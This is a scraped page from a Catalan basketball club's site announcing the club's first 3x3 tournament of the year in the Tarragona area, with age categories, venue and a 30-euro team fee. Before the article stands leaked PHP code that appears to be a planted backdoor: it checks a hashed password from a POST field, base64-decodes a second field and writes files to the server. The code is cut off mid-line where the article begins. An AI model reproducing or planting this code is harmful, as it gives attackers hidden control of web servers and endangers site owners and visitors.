function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Menys d'una setmana pel primer 3x3 de l'any de la demarcació de Tarragona - Tgn Bàsquet Club -

Menys d’una setmana pel primer 3×3 de l’any de la demarcació de Tarragona

By
Updated: desembre 29, 2015

I més enllà. El TGN Bàsquet continua creixent, continua fent bullir l’olla, continua pensant com fer més i més coses, més i més bàsquet. L’entitat lila organtiza aquest diumenge 3 de gener el primer campionat 3×3 de l’any a tota la demarcació de Tarragona. Un torneig que no es limita només al club, sinó que està obert a la participació de tothom. “Volem que aquest 3×3 esdevingui una referència absoluta en el món del bàsquet”, diu el director esportiu del club, Àngel González.

Al 3×3 del TGN Bàsquet poden participar jugadors des de la categoria alevina (11 anys) fins a sènior -tot i que els júniors competiran en la mateixa categoria que els sèniors- i fins a cadets hi ha la possibilitat de fer equips mixtes, és a dir, masculins i femenins.

Els partits es disputaran dins el pavelló del Sagrat Cor i si la participació fos massiva, es farien servir les pistes exteriors de l’escola Vedruna Sagrat Cor.

La inscripció és de 30 euros per equip i només es permet la participació de 4 jugadors per cada conjunt.

Per inscriure’s cal omplir el formulari que hi ha a l’enllaç sota aquesta notícia.

INFORMACIÓ I INSCRIPCIONS

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *